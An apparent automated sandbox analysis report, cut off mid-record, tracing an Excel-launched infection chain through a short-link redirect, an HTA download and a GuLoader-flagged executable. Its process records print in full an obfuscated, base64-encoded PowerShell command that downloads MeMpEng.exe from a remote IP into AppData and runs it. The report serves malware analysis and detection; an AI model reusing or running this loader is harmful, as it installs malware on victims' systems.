                                                        Aug 28, 2024 07:01:26.800951004 CEST672INData Raw: 75 d0 50 e8 70 42 00 00 3b c3 0f 84 07 10 00 00 3b 45 d8 0f 84 6c 01 00 00 3b 45 e0 0f 85 f1 12 00 00 8b 45 e4 e9 f4 12 00 00 6a f0 e8 5e 14 00 00 ff 75 d4 50 e8 ea 42 00 00 e9 d4 12 00 00 6a 01 e8 49 14 00 00 50 e8 e2 4b 00 00 e9 d0 0c 00 00 6a
                                                        Data Ascii: uPpB;;El;EEj^uPBjIPKjjEUYEYjuUEPEK9]fuE9]zM;}4;h;~EpPWZK9]}WeKEy]E=4fG+j j1
                                                        Aug 28, 2024 07:01:26.800962925 CEST1236INData Raw: 3b f3 0f 84 cb 07 00 00 83 c6 04 bf c8 a5 40 00 56 57 e8 61 49 00 00 a1 28 ce 40 00 83 c0 04 50 56 e8 52 49 00 00 a1 28 ce 40 00 57 83 c0 04 50 e9 a8 0e 00 00 39 5d d4 74 25 3b f3 0f 84 35 0d 00 00 8d 46 04 50 57 e8 2c 49 00 00 8b 06 56 a3 28 ce
                                                        Data Ascii: ;@VWaI(@PVRI(@WP9]t%;5FPW,IV(@@hj@@uFP;I(@5(@j:jUE-EYUYEtj3:EEtjD*E}!juLjUYUYMtURQ
                                                        Aug 28, 2024 07:01:26.800973892 CEST1236INData Raw: c8 ff 55 c0 85 c0 74 3c 8d 45 b4 50 8d 45 bc 50 68 14 a0 40 00 ff 75 08 ff 55 e8 85 c0 74 25 8b 45 bc 8b 4d dc ff 74 88 08 57 e8 bc 43 00 00 8b 45 dc 8b 4d bc ff 74 81 0c ff 75 f4 e8 aa 43 00 00 89 5d fc ff 75 08 e9 34 fb ff ff 39 1d 20 83 7a 00
                                                        Data Ascii: Ut<EPEPh@uUt%EMtWCEMtuC]u49 zEjj9]EtW@;EujSW@;Et{uufH;t99]]tut-E$h@h(@Vhuuj?49]
                                                        Aug 28, 2024 07:01:26.800986052 CEST1236INData Raw: 40 00 33 c9 41 85 c0 75 2e 83 7d 08 04 74 13 39 4d 08 74 06 83 7d 08 02 75 1d 8b 45 e0 89 45 fc eb 74 ff 37 33 c0 39 5d e0 57 0f 94 c0 89 45 fc e8 e2 3e 00 00 eb 66 66 89 1f 89 4d fc eb 5e 68 19 00 02 00 e8 3e 08 00 00 6a 03 8b f0 e8 d3 07 00 00
                                                        Data Ascii: @3Au.}t9Mt}uEEt739]WE>ffM^h>j;YUfn9]MtQWPV@SSSMSQWPV@tEfV@"W>;PjuuP9P/E38E;t
                                                        Aug 28, 2024 07:01:26.801000118 CEST1236INData Raw: 8b f8 ff 15 fc 80 40 00 6a f3 3b fb 5e 7d 13 6a ef 5e ff 75 c0 ff 15 44 81 40 00 c7 45 fc 01 00 00 00 56 e9 96 f8 ff ff 53 e8 23 03 00 00 8b f8 59 3b 3d 8c 82 7a 00 89 55 f0 0f 83 bb fe ff ff 8b f7 8b 45 d8 69 f6 18 08 00 00 03 35 88 82 7a 00 3b
                                                        Data Ascii: @j;^}j^uD@EVS#Y;=zUEi5z;|uVu:Q+MtjYUEuFP:NEM9]JWr?S YU09]t"9]tPfSSS9
                                                        Aug 28, 2024 07:01:26.801012039 CEST1236INData Raw: 00 75 67 8d 85 ec fd ff ff 68 05 01 00 00 50 53 8b 1d 04 80 40 00 eb 27 85 ff 75 4e ff 75 10 8d 85 ec fd ff ff 50 ff 75 fc e8 74 ff ff ff 85 c0 75 16 8d 85 ec fd ff ff 68 05 01 00 00 50 57 ff 75 fc ff d3 85 c0 74 d0 ff 75 fc ff 15 10 80 40 00 6a
                                                        Data Ascii: ughPS@'uNuPutuhPWutu@j9uuu@u@jVuu_^[U}ujhju@E}uL6yy;rPjdQH@PEh@P,@EP
                                                        Aug 28, 2024 07:01:26.801026106 CEST1236INData Raw: 40 00 50 ff 15 2c 82 40 00 83 c4 0c 8d 85 6c ff ff ff 50 6a 00 e8 bf 21 00 00 89 7d f0 85 f6 74 35 83 7d 10 00 75 15 56 ff 75 f4 ff 75 0c e8 c3 2c 00 00 85 c0 74 2f 01 75 fc eb 0e a1 38 ce 40 00 01 75 fc 29 75 f8 89 45 f4 83 7d ec 04 0f 85 45 ff
                                                        Data Ascii: @P,@lPj!}t5}uVuu,t/u8@u)uE}Eq}ej[jWu>9}~T]9]u|7yVWEt/VWu\,tu)u}9u}uVWujXuE_^[t$t$5@+jjt$5
                                                        Aug 28, 2024 07:01:26.805907011 CEST1236INData Raw: 00 c1 e0 10 0b c1 33 c9 99 0b c8 8b c5 0b c2 8b 17 3b d1 75 07 8b 57 04 3b d0 74 06 4f 4f 3b fb 73 ed 33 ed 3b fb c7 44 24 18 e8 a1 40 00 72 43 66 89 2f 83 c7 08 57 e8 1b 26 00 00 85 c0 0f 84 62 01 00 00 57 68 00 38 7b 00 e8 31 2c 00 00 57 68 00
                                                        Data Ascii: 3;uW;tOO;s3;D$@rCf/W&bWh8{1,Wh@{&,l$zD$ 3!VD$(,t$hz+f9-8{uhH{h8{+}X{D$D$zzl$l$UhX@t$$,@pz W+


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.2249169192.3.243.166803148C:\Windows\System32\mshta.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 28, 2024 07:01:41.209705114 CEST461OUTGET /xampp/vcc/ideanetowroking.hta HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: en-US
                                                        UA-CPU: AMD64
                                                        Accept-Encoding: gzip, deflate
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                        If-Modified-Since: Tue, 27 Aug 2024 02:50:40 GMT
                                                        Connection: Keep-Alive
                                                        Host: 192.3.243.166
                                                        If-None-Match: "1cadc-620a14e9cef29"
                                                        Aug 28, 2024 07:01:41.779788971 CEST275INHTTP/1.1 304 Not Modified
                                                        Date: Wed, 28 Aug 2024 05:01:41 GMT
                                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                        Last-Modified: Tue, 27 Aug 2024 02:50:40 GMT
                                                        ETag: "1cadc-620a14e9cef29"
                                                        Accept-Ranges: bytes
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.224916188.99.66.384433492C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        TimestampBytes transferredDirectionData
                                                        2024-08-28 05:01:16 UTC321OUTGET /6XcI3x HTTP/1.1
                                                        Accept: */*
                                                        UA-CPU: AMD64
                                                        Accept-Encoding: gzip, deflate
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                        Host: zhort.de
                                                        Connection: Keep-Alive
                                                        2024-08-28 05:01:16 UTC461INHTTP/1.1 302 Found
                                                        Server: openresty
                                                        Date: Wed, 28 Aug 2024 05:01:16 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Content-Length: 72
                                                        Connection: close
                                                        X-DNS-Prefetch-Control: off
                                                        X-Frame-Options: SAMEORIGIN
                                                        Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                        X-Download-Options: noopen
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 0
                                                        Location: http://192.3.243.166/xampp/vcc/ideanetowroking.hta
                                                        Vary: Accept
                                                        X-Served-By: zhort.de
                                                        2024-08-28 05:01:16 UTC72INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 34 33 2e 31 36 36 2f 78 61 6d 70 70 2f 76 63 63 2f 69 64 65 61 6e 65 74 6f 77 72 6f 6b 69 6e 67 2e 68 74 61
                                                        Data Ascii: Found. Redirecting to http://192.3.243.166/xampp/vcc/ideanetowroking.hta


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.224916388.99.66.384433756C:\Windows\System32\mshta.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-08-28 05:01:19 UTC345OUTGET /6XcI3x HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: en-US
                                                        UA-CPU: AMD64
                                                        Accept-Encoding: gzip, deflate
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                        Host: zhort.de
                                                        Connection: Keep-Alive
                                                        2024-08-28 05:01:19 UTC461INHTTP/1.1 302 Found
                                                        Server: openresty
                                                        Date: Wed, 28 Aug 2024 05:01:19 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Content-Length: 72
                                                        Connection: close
                                                        X-DNS-Prefetch-Control: off
                                                        X-Frame-Options: SAMEORIGIN
                                                        Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                        X-Download-Options: noopen
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 0
                                                        Location: http://192.3.243.166/xampp/vcc/ideanetowroking.hta
                                                        Vary: Accept
                                                        X-Served-By: zhort.de
                                                        2024-08-28 05:01:19 UTC72INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 34 33 2e 31 36 36 2f 78 61 6d 70 70 2f 76 63 63 2f 69 64 65 61 6e 65 74 6f 77 72 6f 6b 69 6e 67 2e 68 74 61
                                                        Data Ascii: Found. Redirecting to http://192.3.243.166/xampp/vcc/ideanetowroking.hta


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.224916688.99.66.384433492C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        TimestampBytes transferredDirectionData
                                                        2024-08-28 05:01:38 UTC321OUTGET /6XcI3x HTTP/1.1
                                                        Accept: */*
                                                        UA-CPU: AMD64
                                                        Accept-Encoding: gzip, deflate
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                        Host: zhort.de
                                                        Connection: Keep-Alive
                                                        2024-08-28 05:01:38 UTC461INHTTP/1.1 302 Found
                                                        Server: openresty
                                                        Date: Wed, 28 Aug 2024 05:01:38 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Content-Length: 72
                                                        Connection: close
                                                        X-DNS-Prefetch-Control: off
                                                        X-Frame-Options: SAMEORIGIN
                                                        Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                        X-Download-Options: noopen
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 0
                                                        Location: http://192.3.243.166/xampp/vcc/ideanetowroking.hta
                                                        Vary: Accept
                                                        X-Served-By: zhort.de
                                                        2024-08-28 05:01:38 UTC72INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 34 33 2e 31 36 36 2f 78 61 6d 70 70 2f 76 63 63 2f 69 64 65 61 6e 65 74 6f 77 72 6f 6b 69 6e 67 2e 68 74 61
                                                        Data Ascii: Found. Redirecting to http://192.3.243.166/xampp/vcc/ideanetowroking.hta


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.224916888.99.66.384433148C:\Windows\System32\mshta.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-08-28 05:01:40 UTC345OUTGET /6XcI3x HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: en-US
                                                        UA-CPU: AMD64
                                                        Accept-Encoding: gzip, deflate
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                        Host: zhort.de
                                                        Connection: Keep-Alive
                                                        2024-08-28 05:01:41 UTC461INHTTP/1.1 302 Found
                                                        Server: openresty
                                                        Date: Wed, 28 Aug 2024 05:01:40 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Content-Length: 72
                                                        Connection: close
                                                        X-DNS-Prefetch-Control: off
                                                        X-Frame-Options: SAMEORIGIN
                                                        Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                        X-Download-Options: noopen
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 0
                                                        Location: http://192.3.243.166/xampp/vcc/ideanetowroking.hta
                                                        Vary: Accept
                                                        X-Served-By: zhort.de
                                                        2024-08-28 05:01:41 UTC72INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 34 33 2e 31 36 36 2f 78 61 6d 70 70 2f 76 63 63 2f 69 64 65 61 6e 65 74 6f 77 72 6f 6b 69 6e 67 2e 68 74 61
                                                        Data Ascii: Found. Redirecting to http://192.3.243.166/xampp/vcc/ideanetowroking.hta


                                                        Click to jump to process

                                                        Click to jump to process

                                                        Click to dive into process behavior distribution

                                                        Click to jump to process

                                                        Target ID:0
                                                        Start time:01:00:53
                                                        Start date:28/08/2024
                                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                        Imagebase:0x13f6c0000
                                                        File size:28'253'536 bytes
                                                        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:4
                                                        Start time:01:01:16
                                                        Start date:28/08/2024
                                                        Path:C:\Windows\System32\mshta.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                        Imagebase:0x13f920000
                                                        File size:13'824 bytes
                                                        MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:5
                                                        Start time:01:01:19
                                                        Start date:28/08/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\system32\cmd.exe" "/C pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"
                                                        Imagebase:0x49f80000
                                                        File size:345'088 bytes
                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:7
                                                        Start time:01:01:19
                                                        Start date:28/08/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"
                                                        Imagebase:0x13f940000
                                                        File size:443'392 bytes
                                                        MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:8
                                                        Start time:01:01:23
                                                        Start date:28/08/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nxtolslo\nxtolslo.cmdline"
                                                        Imagebase:0x13fc30000
                                                        File size:2'758'280 bytes
                                                        MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:9
                                                        Start time:01:01:23
                                                        Start date:28/08/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA15F.tmp" "c:\Users\user\AppData\Local\Temp\nxtolslo\CSCFB69AE6B65A0404EAF48BF1216DF885C.TMP"
                                                        Imagebase:0x13fa60000
                                                        File size:52'744 bytes
                                                        MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:11
                                                        Start time:01:01:29
                                                        Start date:28/08/2024
                                                        Path:C:\Users\user\AppData\Roaming\MeMpEng.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Roaming\MeMpEng.exe"
                                                        Imagebase:0x400000
                                                        File size:598'995 bytes
                                                        MD5 hash:A80E27FBED396BE3D87FE48DA3C4F266
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000B.00000002.836188866.000000000492A000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:12
                                                        Start time:01:01:37
                                                        Start date:28/08/2024
                                                        Path:C:\Windows\System32\mshta.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                        Imagebase:0x13f230000
                                                        File size:13'824 bytes
                                                        MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:14
                                                        Start time:01:01:41
                                                        Start date:28/08/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\system32\cmd.exe" "/C pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"
                                                        Imagebase:0x4aae0000
                                                        File size:345'088 bytes
                                                        MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:16
                                                        Start time:01:01:41
                                                        Start date:28/08/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:pOwERShEll.eXE -Ex byPasS -NOP -w 1 -C DEvicEcREdeNTIaLdEployment ; Iex($(IEx('[SyStem.TExT.EncODing]'+[CHaR]0X3A+[chAr]0X3a+'UTF8.getsTRIng([sySTEm.CONVErT]'+[CHaR]58+[Char]0x3A+'fROMBASE64StRiNG('+[CHar]34+'JE9TQzgxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFUkRFRmluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBGY1pjall6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzc1hlUSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNVelAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZSmdRSEt2LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVckIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInB1UWd1aERYUXkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV3JKQWJ0TVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkT1NDODE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTY2LzM0MC9NZU1wRW5nLmV4ZSIsIiRlblY6QVBQREFUQVxNZU1wRW5nLmV4ZSIsMCwwKTtTdEFydC1TbGVFcCgzKTtzdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIg=='+[CHAr]0X22+'))')))"
                                                        Imagebase:0x13fdb0000
                                                        File size:443'392 bytes
                                                        MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:17
                                                        Start time:01:01:43
                                                        Start date:28/08/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4xnxdpzb\4xnxdpzb.cmdline"
                                                        Imagebase:0x13fe00000
                                                        File size:2'758'280 bytes
                                                        MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                        Has elevated privileges:true
